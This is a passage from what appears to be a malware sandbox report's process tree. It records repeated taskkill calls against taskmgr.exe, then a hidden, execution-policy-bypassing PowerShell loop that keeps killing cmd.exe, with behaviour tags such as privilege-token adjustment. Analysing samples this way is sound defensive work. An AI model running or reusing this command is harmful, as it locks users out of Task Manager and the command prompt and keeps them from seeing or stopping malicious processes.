    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3832
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3152
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2988
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2916
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1728
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4928
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3220
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4952
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1644
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4660
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3676
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1296
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2828
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2420
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3100
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4516
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3996
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2840
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2364
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4388
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3832
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3580
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1164
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2988
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3256
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2336
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3944
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3832
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:1296
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:5068
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4812
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:4964
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2496
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1664
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3156
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:796
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:5112
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3152
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2864
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4180
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4388
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:5004
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4164
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4784
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3220
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1716
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4288
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4952
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:1728
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4984
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4012
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:644
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2004
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3172
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:2820
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4696
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
        5⤵
        
        PID:4812
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "while($true){ taskkill /f /im cmd.exe}"
      4⤵
      PID:3344
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2420
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3584
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2336
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2276
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3172
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3588
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2824
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2652
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2160
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4820
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:5032
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2920
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:628
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:5000
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1780
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1608
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4012
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4040
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1780
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4028
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3996
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4284
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2008
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:5112
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4284
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4776
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2724
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:5112
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2268
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:5004
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2496
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:756
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4492
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1356
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2276
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3452
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1192
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1164
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2904
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3256
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:628
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2560
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1508
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2308
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3100
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1516
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3184
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2268
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:644
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3700
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1728
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2076
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1332
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:756
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:5112
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3580
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:552
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2840
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4388
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4696
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3156
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3376
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1932
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4860
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4776
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:756
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4164
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4860
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1516
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1144
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:5000
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1144
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4200
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:836
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4812
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4192
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4164
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1508
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3156
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2668
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1860
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3156
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4660
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:880
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2076
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4012
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3676
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1296
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4388
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4776
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4592
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2304
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1932
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:628
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1728
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4956
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4776
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2840
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:1332
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3676
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4768
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2160
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:4516
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3524
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3156
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:2840
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
        5⤵
        
        PID:3552
    - - C:\Windows\SysWOW64\taskkill.exe
        
